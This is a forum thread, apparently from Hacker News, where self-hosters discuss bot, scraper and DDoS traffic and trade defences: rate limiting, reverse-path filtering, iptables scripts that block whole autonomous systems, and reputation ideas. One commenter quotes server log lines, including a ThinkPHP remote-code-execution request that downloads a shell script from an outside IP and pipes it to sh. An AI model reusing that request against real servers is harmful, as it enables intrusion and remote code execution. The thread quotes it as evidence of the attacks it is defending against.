Maybe the long-term solution for such attacks is to hide most of the internet behind some kind of Proof of Work system/network, so that mostly humans get to access to our websites, not machines.
Maybe the long-term solution for such attacks is to hide most of the internet behind some kind of Proof of Work system/network, so that mostly humans get to access to our websites, not machines.
The web is really stuck between a rock and a hard place when it comes to this. Proof of work helps website owners, but makes life harder for all discovery tools and search engines.
An independent standard for request signing and building some sort of reputation database for verified crawlers could be part of a solution, though that causes problems with websites feeding crawlers different content than users, an does nothing to fix the Sybil attack problem.
That said, we can likely do better. Cloudflare does good in part because Cloudflare runs so much traffic, so they have a lot of data across the internet. Smaller operators just don't get enough traffic to really deal with banning abusive IPs without banning entire ranges indefinitely, not ideal. I hope to see a solution like Crowdsec where reputation data can be crowdsourced to block known bad bots (at least for a while since they are likely borrowing IPs) while using low complexity (potentially JS-free) challenges for IPs with no bad reputation. It's probably too much to ask for Anubis upstream which is probably already too busy dealing with the challenges of what it already does at the scale it is operating, but it does leave some room for further innovation for whoever wants to go for it.
In my opinion there is at least no reason why it is not plausible to have a drop-in solution that can mostly resolve these problems and make it easier for hobbyists to run services again.
As such, I don’t identify with the author of this post, about trying to resist CloudFlare for moral reasons. A decentralized system where everyone plays nice and mostly cooperates, does not exist any more than a country without a government where everyone plays nice and mostly cooperates. It’s wishful thinking. We already tried this with Email, and we’re back to gatekeepers. Pretending the web will be different is ahistorical.
This is particularly annoying as knowing where people come from is important.
Its just another reason to give up making stuff, and give in to the FAANG and the AI enshittification.
:-(
How about a reputation system?
Attached to IP address is easiest to grok, but wouldn't work well since addresses lack affinity. OK, so we introduce an identifier that's persistent, and maybe a user can even port it between devices. Now it's bad for privacy. How about a way a client could prove their reputation is above some threshold without leaking any identifying information? And a decentralized way for the rest of the internet to influence their reputation (like when my server feels you're hammering it)?
Do anti-DDoS intermediaries like Cloudflare basically catalog a spectrum of reputation at the ASN level (pushing anti-abuse onus to ISP's)?
This is basically what happened to email/SMTP, for better or worse :-S.
Services need the ability to obtain an identifier that:
- Belongs to exactly one real person.
- That a person cannot own more than one of.
- That is unique per-service.
- That cannot be tied to a real-world identity.
- That can be used by the person to optionally disclose attributes like whether they are an adult or not.
Services generally don’t care about knowing your exact identity but being able to ban a person and not have them simply register a new account, and being able to stop people from registering thousands of accounts would go a long way towards wiping out inauthentic and abusive behaviour.
The ability to “reset” your identity is the underlying hole that enables a vast amount of abuse. It’s possible to have persistent, pseudonymous access to the Internet without disclosing real-world identity. Being able to permanently ban abusers from a service would have a hugely positive effect on the Internet.
I don't think you need world-wide law-enforcement, it'll be a big step ahead if you make owners & operators liable. You can limit exposure so nobody gets absolutely ruined, but anyone running wordpress 4.2 and getting their VPS abused for attacks currently has 0 incentive to change anything unless their website goes down. Give them a penalty of a few hundred dollars and suddenly they do. To keep things simple, collect from the hosters, they can then charge their customers, and suddenly they'll be interested in it as well, because they don't want to deal with that.
The criminals are not held liable, and neither are their enablers. There's very little chance anything will change that way.
It would be way to easy for the current regime (whomever that happens to be) to criminalize random behaviors (Trans People? Atheists? Random nationality?) to ban their identity, and then they can't apply for jobs, get bus fare, purchase anything online, communicate with their lawyers, etc.
20+ years ago there were mail blacklists that basically blocked residential IP blocks as there should not be servers trying to send normal mail from there. Now you must try the opposite, blacklist blocks where only servers and not end users can come from, as there is potentially bad behaved scrapers in all major clouds and server hosting platforms.
But then there are residential proxies that pay end users to route requests from misbehaved companies, so that door is also a bad mitigation
International law enforcement on the Internet would also subject you to the laws of other countries. It goes both ways.
Having to comply with all of the speech laws and restrictions in other countries is not actually something you want.
The only real solution is to implement some sort of identity management system, but that has so many issues that make it a non-starter.
Of course everything sounds plausible when speaking at such a high level.
Apple and Alphabet seem positioned to easily enable it.
https://www.apple.com/newsroom/2025/11/apple-introduces-digi...
I really don't understand why they do this, and it's mostly some shady origins, like vps game server hoster from Brazil and so on.
I'm at the point where i capture all the traffic and looks for SYN packets, check the RDAP records for them to decide if I then drop the entire subnets of that organization, whitelisting things like Google.
Digital Ocean is notoriously a source of bad traffic, they just don't care at all.
> Fail2ban was struggling to keep up: it ingests the Nginx access.log file to apply its rules but if the files keep on exploding…
> [...]
> But I don’t want to fiddle with even more moving components and configuration
You can configure nginx to do rate-limiting directly. Blog post with more details: https://blog.nginx.org/blog/rate-limiting-nginxIt’s very explainable. And somehow, like clockwork, there are always comments to say “there is nothing new, the Internet has always been like this since the 80s”.
You know, part of me wants to see AI proliferate into more and more areas, just so these people will finally wake up eventually and understand there is a huge difference when AI does it. When they are relentlessly bombarded with realistic phone calls from random numbers, with friends and family members calling about the latest hoax and deepfake, when their own specific reputation is constantly attacked and destroyed by 1000 cuts not just online but in their own trusted circles, and they have to put out fires and play whack-a-mole with an advanced persistent threat that only grows larger and always comes from new sources, anonymous and not.
And this is all before bot swarms that can coordinate and plan long-term, targeting specific communities and individuals.
And this is all before humanoid robots and drones proliferate.
Just try to fast-forward to when human communities online and offline are constantly infiltrated by bots and drones and sleeper agents, playing nice for a long time and amassing karma / reputation / connections / trust / whatever until finally doing a coordinated attack.
Honestly, people just don’t seem to get it until it’s too late. Same with ecosystem destruction — tons of people keep strawmanning it as mere temperature shifts, even while ecosystems around the world get destroyed. Kelp forests. Rainforests. Coral reefs. Fish. Insects. And they’re like “haha global warming by 3 degrees big deal. Temperature has always changed on the planet.” (Sound familiar?)
Look, I don’t actually want any of this to happen. But if they could somehow experience the movie It’s a Wonderful Life or meet the Ghost of Christmas Yet to Come, I’d wholeheartedly want every denier to have that experience. (In fact, a dedicated attacker can already give them a taste of this with current technology. I am sure it will become a decentralized service soon :-( )
Maybe pseudo-anonymity and “punishment” via reputation could work. Then an oppressive government with access to a subversive website (ignoring bad security, coordination with other hijacked sites, etc.) can only poison its clients’ reputations, and (if reputation is tied to sites, who have their own reputations) only temporarily.
Because of the internet, magical times can never be had again. You can invent something new, but as soon as anyone finds out about it, everyone now finds out about it. The "exclusive club" period is no more.
Maybe I've just had bad luck, but since I started hosting my own websites back around 2005 or so, my servers have always been attacked basically from the moment they come online. Even more so when you attach any sort of DNS name to it, especially when you use TLS and the certificates, guessing because they end up in a big index that is easily accessible (the "transparency logs"). Once you start sharing your website, it again triggers an avalanche of bad traffic, and the final boss is when you piss of some organization and (I'm assuming) they hire some bad actor to try to make you offline.
Dealing with crawlers, bot nets, automation gone wrong, pissed of humans and so on have been almost a yearly thing for me since I started deploying stuff to the public internet. But again, maybe I've had bad luck? Hosted stuff across wide range of providers, and seems to happen across all of them.
I'm doing this for a dozen services hosted at home. The reverse proxy just drops the request if user does not present a certificate. My devices which can present cert can connect seamlessly. It's a one time setup but once done you can forget about it.
Another potential cause: It's way easier for pretty much any person connected to the internet to "create" their own automation software by using LLMs. I could wager even the less smart LLMs could handle "Create a program that checks this website every second for any product updates on all pages" and give enough instructions for the average computer user to be able to run it without thinking or considering much.
Multiply this by every person with access to an LLM who wants to "do X with website Y" and you'll get an magnitude increase in traffic across the internet. This been possible since what, 2023 sometime? Not sure if the patterns would line up, but just another guess for the cause(s).
edit: words
You're absolutely right: AWS, GCP, Azure and others, they do not care and especially AWS and GCP are massive enablers.
I never felt this made the internet "unsafe". Instead, it just reminded me how I messed up. Every time, I learned how to do better, and I added more guardrails. I haven't gotten popped that obviously in a long time, but that's probably because I've acted to minimize my public surface area, used star-certs to avoid being in the cert logs, added basic auth whenever I can, and generally refused to _trust_ software that's exposed to the web. It's not unsafe if you take precautions, have backups, and are careful about what you install.
If you want to see unsafe, look at how someone who doesn't understand tech tries to interact with it. Downloading any random driver or exe to fix a problem, installing apps when a website would do, giving Facebook or Tiktok all of their information and access without recognizing that just maybe these multi-billion-dollar companies who give away all of their services don't have your best interests in mind.
Already happens. Oppressive governments already punish people for visiting "wrong" websites. They already censor internet.
There are no technological solutions to coordination problems. Ultimately, no matter what you invent, it's politics that will decide how it's used and by whom.
I've been seeing this too, I guess scrapers think they can get through some blockers with a referrer?
If you want to trade with me, a country that exports software, let's agree to both criminalize software piracy.
No reason why this can't be extended to DDoS attacks.
The only way to solve these problems is using some large hosted platform where they have the resources to constantly be managing these issues. This would solve their problem.
But isn't it sad that we can't host our own websites anymore, like many of us used to? It was never easy, but it's nearly impossible now and this is only one reason.
The conclusion back then was that it's impossible to make a threshold that is both low enough and high enough.
You need some other mechanism that can distinguish bad traffic from good (even if imperfectly), and then adjust the threshold based on it. See, for instance, "Proof of Work can Work": https://sites.cs.ucsb.edu/~rich/class/cs293b-cloud/papers/lu...
This whole enterprise is clearly run by exceptionally dumb people, since you can just clone all the code I host there directly from upstreams...
[16/Nov/2025:16:21:12 +0000] 190.92.214.144:34638 . "GET /cgit/linux/commit/drivers/vlynq?h=v5.15.76&id=59d42cd43c7335a3a8081fd6ee54ea41b0c239be HTTP/1.1" -> 200 3051b 3.42x 0.239ms
[16/Nov/2025:16:22:15 +0000] 188.239.57.1:40328 . "GET /cgit/linux/commit/kernel/range.c?h=v6.12.31&id=459b37d423104f00e87d1934821bc8739979d0e4 HTTP/1.1" -> 200 2993b 3.42x 0.266ms
[16/Nov/2025:16:22:56 +0000] 190.92.217.125:56580 . "GET /cgit/linux/commit/kernel?h=v5.15.92&id=f01aefe374d32c4bb1e5fd1e9f931cf77fca621a HTTP/1.1" -> 200 3091b 3.28x 0.250ms
[16/Nov/2025:16:23:17 +0000] 159.138.10.64:44540 . "GET /cgit/linux/commit/drivers/mtd/mtdcore.c?h=v6.2.15&id=249858575fd3f27904d6bb775e5ab500e9ef3b0f HTTP/1.1" -> 200 3415b 3.47x 0.251ms
[16/Nov/2025:16:23:58 +0000] 119.13.101.228:44342 . "GET /cgit/linux/commit/drivers/gpio?h=v6.6.93&id=bc7fe1a879fc024942bb9eff173fa619b722d09b HTTP/1.1" -> 200 3582b 3.37x 0.250msIf this is your own opinion and not a part of a psyop to condition people into embracing the death of the Internet as we know it, do you have any solution to propose?
Win Win.
1) Most of the civilized world no longer has hereditary dictators (such as "kings"). Because they were removed from power by the people and the power was distributed among many individuals. It works because malicious (anti-social) individuals have trouble working together. And yes, oversight helps.
But it's a spectrum and we absolutely can and should move the needle towards more oversight and more power distribution.
2) Corporate power structures are still authoritarian. We can change that too.
Yes, they can. But we need to admit to ourselves that people are not equal. Not just in terms of skill but in terms of morality and quality of character. And that some people are best kept out.
Corporations, being amoral, should also be kept out.
---
The old internet was the way it was because of gate keeping - the people on it were selected through technical skill being required. Generally people who are builder types are more pro-social than redistributor types.
Any time I've been in a community which felt good, it was full of people who enjoyed building stuff.
Any time such a community died, it was because people who crave power and status took it over.
I've updated my heuristic to only serve the worst offenders, and created honeypots to collect ips and repond with 403s. After a few months, and some other spam tricks I'll keep to myself this time, my traffic is back to something reasonable again.
The only solution seems to be to constantly abandon those things and move on to new frontiers to enjoy until the cycle repeats.
All the way back to the early days of Usenet really.
I would hate to see it but at the same time I feel like the incentives created by the bad actors really push this towards a much more centralized model over time, e.g. one where all traffic provenance must be signed and identified and must flow through a few big networks that enforce laws around that.
Very crudely if you think that a request costs the server ~10ms of compute time and a phone is 30x slower then you'd need 300ms of client compute time to equal it which seems very reasonable.
The only problem is you would need a cryptocurrency that a) lets you verify tiny chunks of work, and b) can't be done faster than you can do it on a phone using other hardware, and c) lets a client mine money without being to actually spend it ("homomorphic mining"?).
I don't know if anything like that exists but it would be an interesting problem to solve.
> It would be way to easy for the current regime (whomever that happens to be) to criminalize random behaviors (Trans People? Atheists? Random nationality?) to ban their identity, and then they can't apply for jobs, get bus fare, purchase anything online, communicate with their lawyers, etc.
Authoritarian regimes can already do that.
I think perhaps you might’ve missed the fact that what I was suggesting was individual to each service:
> Reputation plus privacy is probably unsolvable; the whole point of reputation is knowing what people are doing elsewhere. You don’t need reputation, you need persistence. You don’t need to know if they are behaving themselves elsewhere on the Internet as long as you can ban them once and not have them come back.
I was saying don’t care about what people are doing elsewhere on the Internet. Just ban locally – but persistently.
That's not how culture evolves. You don't necessarily need to have a problem so that a solution is developed. You can very well have a technology developed for other purposes, or just for exploration sake, and then as this tech exists uses for it start to pop post hoc.
You therefore ignore the immense benefit of access to information that technology has, something that wasn't necessarily a problem for the common man but once its there, the popularization of the access to information, they adapt and grow dependent on it. Just like electricity.
In the early days I put Google Analytics on the site so I could observe traffic trends. Then, we were all forced to start adding certificates to our sites to keep them "safe".
While I think we're all doomed to continue that annual practice or get blocked by browsers, I have often considered removing Google Analytics. Ever since their redesign it is essentially unusable for me now. What benefit does it bring if I can't understand the product anymore?
Last year, in a fit of desperation, I added Cloudflare. This has a brute force "under attack" mode that seems to stop all bots from accessing the site. It puts up a silly "hang on a second, are you human" page before the site loads, but it does seem to work. It is great UX? No, but at least the site isn't getting hammered by various locations in Asia. Cloudflare also let me block entire countries, although that seems to be easily fooled.
I also don't think a lot of the bots/AI crawlers honor the rules set in the robots.txt. It's all an honor system anyway, and they are completely lacking in it.
There need to be some hard and fast rules put in place, somehow, to stop the madness.
Honestly I have no idea how well it works, my logs are still full of bots. *Slow* bots, though. As long as they’re not ddosing me I guess it’s fine?
I believe the correct verb is monetised.
My tiny personal web servers can whistand thousands of requests per second, barely breaking a sweat. As a result, none of the bots or scrapers are causing any issue.
"The only thing that had immediate effect was sudo iptables -I INPUT -s 47.79.0.0/16 -j DROP" Well, by blocking an entire /16 range, it is this type of overzealous action that contributes to making the internet experience a bit more mediocre. This is the same thinking that lead me to, for example, not being able to browse homedepot.com from Europe. I am long-term traveling in Europe and like to frequent DIY websites with people posting links to homedepot, but no someone at HD decided that European IPs couldn't access their site, so I and millions of others are locked out. The /16 is an Alibaba AS, and you make the assumption that most of it is malicious, but in reality you don't know. Fix your software, don't blindly block.
People with dialup telephones never asked for a smartphone connected to internet. They were just as happy back then or even more happy because phone didn't eat off their time or cause posture problems.
Sure, shopping was slower without amazon website, but not less happy experience back then. Infact homes had less junk and people saved more money
Messaging? sure it makes you spend time with 100 whatsapp groups, where 99% of the people don't know you personally.
It helped companies to sell more of the junk more quickly.
It created bloggers and content creators who lived in an imaginary world thinking that someone really consumes their content.
It created karma beggers who begged globally for likes that are worth nothing.
It created more concentration of wealth at some weird internet companies, which don't solve any of the world problems or basic needs of the people.
And finally it created AI that pumps plastic sewage to fill the internet. There it is, your immensely useful internet.
As if the plastic pollution was not enough in the real world, the internet will be filled with plastic content.
What else did internet give that is immensely helpful?
I'm neither. I believe that we should go back to being "tribes"/communities. At least it's a time-tested way to – maybe not prevent, but somewhat allieviate – the tragedy of the commons.
(I'm aware that this is a very poor and naive theory; I'll happily ditch it for a better idea.)
--
*) For the lack of a better word.
79.124.40.174 - - [16/Nov/2025:17:04:52 +0000] "GET /?XDEBUG_SESSION_START=phpstorm HTTP/1.1" 404 555 "http://142.93.104.181:80/?XDEBUG_SESSION_START=phpstorm" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" ... 145.220.0.84 - - [16/Nov/2025:15:00:21 +0000] "\x16\x03\x01\x00\xCE\x01\x00\x00\xCA\x03\x03\xF7:\xB4]D\x0C\xD0?\xEF~\xAC\xF8\x8C\x80us\xB8=\x0F\x9C\xA8\xC1\xDD\xC4\xDF2\x8CQC\x18\xDC\x1D \xD0{\xC9\x01\xEC\x227\xCB9\xBE\x8C\xE0\xB2\x9F\xCF\x97\xF6\xBE\x88z/\xD7;\xB1\x8C\xEEu\x00\xBF]<\x92\x00" 400 157 "-" "-" "-" 145.220.0.84 - - [16/Nov/2025:15:00:21 +0000] "\x16\x03\x01\x00\xCE\x01\x00\x00\xCA\x03\x03\x8A\xB5\xA4)n\x10\x8CO(\x99u\xD8\x13\x0B\xB7h7\x16\xC5[\x85<\xD3\xDC\x9C\xAB\x89\xE0\x0B\x08a\xDE \x9F2Z\xCD\xD1=\x9B\xBAU1\xF3h\xC1\xEEY<\xAEuZ~2\x81Cg\xFD\x87\x84\xA3\xBA:$\xC8\x00" 400 157 "-" "-" "-"
or:
"192.159.99.95 - - [16/Nov/2025:13:44:03 +0000] "GET /public/index.php?s=/Index/\x5Cthink\x5Capp/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=%28wget%20-qO-%20http%3A%2F%2F74.194.191.52%2Frondo.txg.sh%7C%7Cbusybox%20wget%20-qO-%20http%3A%2F%2F74.194.191.52%2Frondo.txg.sh%7C%7Ccurl%20-s%20http%3A%2F%2F74.194.191.52%2Frondo.txg.sh%29%7Csh HTTP/1.1" 301 169 "-" "Mozilla/5.0 (bang2013@atomicmail.io)" "-"
These are just some examples, but they happen pretty much daily :(
Probably someone DDoSing a Minecraft server or something.
People in games do this where they DDoS each other. You can get access to a DDoS panel for as little as $5 a month.
Some providers allow for spoofing the src ip, that's how they do these reflection attacks. So you're not actually dropping the sender of these packets, but the victims.
Consider turning reverse path filter to strict as a basic anti spoofing method and see if it helps
net.ipv4.conf.all.rp_filter = 1
net.ipv4.conf.default.rp_filter = 1Though I have to admit I dont know who your target audience would be. Self-hosting orgs don't tend to be flush with cash
It is fun to create honeypots for things like SSH and RDP and automatically block the source IPs
You're not wrong that abuse would be a massive issue, but I'm on the other side of this and need Amazon to do something, anything.
A friend of mine, who had a similar opinion on technology, once watched a movie that seemed to reinforce it in his eyes, and tried to persuade me as if it was the ultimate proof that all technology is evil.
The plot depicted a happy small tribe of indigenous people deep in the rainforest, who never ever saw any artifacts of civilization. They never knew war, homicide, or theft. Basically, they knew no evil. Then, one day, a plane flies over and someone frivolously tosses an emptied bottle of Coca-Cola out of the window (sic!). A member of the tribe finds it in the forest and brings back to the village. And, naturally, everyone else wants to get hold of the bottle, because it's so supernatural and attractive. But the guy decides he's the only owner, refuses and then of course kills those who try to get it by force, and all hell breaks loose in no time.
"See", - concludes my friend triumphally, - "the technology brought evil into this innocent tribe!"
"But don't you think that evil already lurked in those people to start with, if they were ready to kill each other for shiny things?" - I asked, quite baffled.
"Oh, come on, so you're just supporting this shit!" was the answer...
I worked in e-commerce previously, we reduce fraud to almost zero by banning non-local cards. It affected a few customers that had international credit cards, but not enough to justify dealing with the fraud. Sometimes you just need to limit your attack surface.
It's possible that the services that reward users for running proxies (or are bundled with mobile apps with a notice buried in the license) would also start rewarding/hiding compute services as well. There's currently no money in it because proof-of-work is so rare, but if it changes, their strategy might too.
I still think it is possible with some customized variant of RandomX. The server could even make a bit of money by acting as a mining pool by forcing the clients to mine a certain block template. It's just that it would need to be installed as a browser plugin or something, it wouldn't be efficient running within a page.
Also the verification process for RandomX is still pretty intensive. so there is a high minimum bar for where it would be feasible.
(An Alibaba /16? I block not just 3/8, but every AWS range I can find.)
What's next, blaming electromagnetic field and devices to modulate it for beeing full of propaganda, violence and all kinds of filth the humankind is capable of creating? You find what you seek, and if not, keep turning that damn knob further.
But since you insist, some good frequencies to tune into:
1) Self-education in whatever field of practical or theoretical knowldege you're interested in;
2) Seeing a wider picture of the world than your local authorities would like you to (yes, basically seing that all the world's kings are naked, which is the #1 reason why the Internet became such a major pain in the ass for the kings' trade union, so to say);
3) Being able to work from any location in the world with access to the Internet;
4) You mentioned selling trash en masse worldwide, but I know enough examples of wonderful things produced by independent people and sold worldwide.
The list could be longer, but I hate doing useless and thankless work.
Then there's also the issue with dependence to US-based services, but that may not be an issue for you.
All of this reminds me of some of Gibson's short stories I read recently and his description of Cyberspace: small corporate islands of protected networks in a hostile sea of sapient AIs ready to burn your brain.
Luckily, LLMs are not there yet, except you can still get your brain burnt from AI slop or polarizing short videos.
Minutes after coming into existence, I have half a dozen connections to sshd from Chinese IP addresses.
That teaches the use of SSH keys.
I'd hope other major clouds would do the same
Sadly, like many people, I just deal with the traffic as opposed to getting around to actually writing a tool to block it.
Why should it be an ISP's job to police what their users can and can't do? I really don't think you want service providers to start moderating things.
Does your electricity company ban the use of red light bulbs? Would everyone be ok with such restrictions?
I think it's one of the multi-faceted problems where technology (a "moat", "palisade", etc. for your "tribe") should accompany social changes.
My then PageRank 6 Business Website got attacked non stop starting around the 2008.
At this time my log files exploded as well: the Script Kiddies entered the arena.
At the time the first tools leaked into the public to scan for IP ranges and check websites for certain attack vectors.
I miss the era between Compuserve, AOL around 1995 till 2008.
Web Rings, Technorati, fantastic Fan Sites before Wikipedia - wholesome.
Term: Script Kiddies https://en.wikipedia.org/wiki/Script_kiddie
Anyone who owns a chrome extension with 50k+ installs is regularly asked to sell it to people (myself included). The people who buy the extensions try to monetize them any way they can, like proxying traffic for malicious scrapers / attacks.
But I agree that keys are not optional anymore.
Today, my entire network of self hosted stuff exists in a personal wireguard VPN. My firewall blocks everything except the wireguard port (even SSH).
It really can not be overstated how unsustainable the status quo is.
> moving the entire hosting to CloudFlare that will do it for me ... nor do I want to route my visitors through tracking-enabled USA servers
Isn't there some EU equivalent to CloudFlare he can use?
It's hard to admit, but DDoS mitigation is an essential part of having even a simple website these days.
TEMPDIR=$(mktemp -d)
trap 'rm -r "$TEMPDIR"' EXIT
curl https://archive.routeviews.org/oix-route-views/oix-full-snap... -Lo "$TEMPDIR/snapshot.bz2"
bzgrep -e " (15828|213035|400377|399471|210654|46573|211252|62904|135542|132372|36352|209641|7552|36352|12876|53667|138608|150393|60781|138607) i" $TEMPDIR/snapshot.bz2 | cut -d" " -f 3 | sort | uniq > $TEMPDIR/badranges
iptables -N BAD_AS || true
iptables -D INPUT -j BAD_AS || true
iptables -A INPUT -j BAD_AS
iptables -F BAD_AS
for ROUTE in $(cat "$TEMPDIR/badranges"); do
iptables -A BAD_AS -s $ROUTE -j DROP;
doneLook at the HN karma system--you start with limited features, and as you show yourself a good user, you get more features (and also trust/standing with the community). "Resetting" your identity only ever loses you something.
Apply the same thing to a git host getting hammered or something--by default, users can't view the history online or something (can still clone), but as your identity establishes reputation (through positive interactions, or even just browsing in a non-bot-like manner), your reputation increases and you get rate-limited access or something.
This is essentially where a lot of spam ended up--it used to be that your mail was deliverable until you acted poorly, then your reputation was bad and your deliverability went down. Now it more closely resembles this--your reputation is bad until you send enough good mail and take enough good actions (DKIM/SPF, etc) to show yourself as good.
The issues really all stems from "resetting your identity gets you back in good standing". Once you take that out of the mix, you no longer need to worry much about limiting identities, tying them to the real world, ensuring they're persistent, or many of the other hard problems that come up.
The internet has been full of rogue actors and soft targets since shortly after its inception.
It may have had a small enough user base to be considered a safe haven for a brief period, but it was before my time.
> If you want to see unsafe, look at how someone who doesn't understand tech tries to interact with it.
Personal actions (and their safety) are a different category from environments (and their safety).
IPv6 would solve this and we get the end-to-end nature of the internet back. So everybody will start screaming for IPv6 when?
Shouldn’t take more than a second to perform the motions as a website visitor..
If the movement is suspiciously smooth, or isn’t accelerated and decelerated as a human hand would, it’s a bot - or an agentic browser.
BitTorrent is just as susceptible to this, it's just there's currently no economic incentive to try to exhaustively scrape it from 50,000 VPS nodes.
AS4229 Zenlayer (Singapore) PTE. LTD
AS21859 ZEN-ECN, US
AS45102 ALIBABA-CN-NET Alibaba US Technology Co., Ltd., CN
AS132203 TENCENT-NET-AP-CN Tencent Building, Kejizhongyi Avenue, CN
AS136907 HUAWEI INTERNATIONAL PTE. LTD.
That's 4392 contiguous IP ranges.I have accessed websites that do not use ICANN DNS nor TLS, sometimes on ports other than common ones like 80, 443, etc.
The term "website" to me means an IP address from which an operator publishes hypertext (HTML) and responds to HTTP requests
But others might define "website" differently
On home network for experimentation I create own TLDs in custom root.zone and use non-TLS per packet encryption to serve HTML over UDP instead of TCP
The blog post refers to "safe haven"
Usually "safe haven" means there is something that one is seeking protection from
It is not clear from the blog post what the author believes "the internet" was previously a safe haven from
Not to mention the www != the internet
It's possible the broader internet, including many "unused" ports between 0-65536, could be a "safe haven" from the web what with "AI bots"
No, it really isn't. Unless you mean like on the BGP level. But it's p2p in the sense where you have to trust every party not to break the system. It's like email or mastodon, it doesn't solve the fundamental sybil problem at hand.
>BitTorrent is just as susceptible to this,
In bittorrent things are hosted by adhoc users are that are roughly proportional to the number of downloaders. It is not unimaginable that you could staple a reputation system on top of it like PTs already do.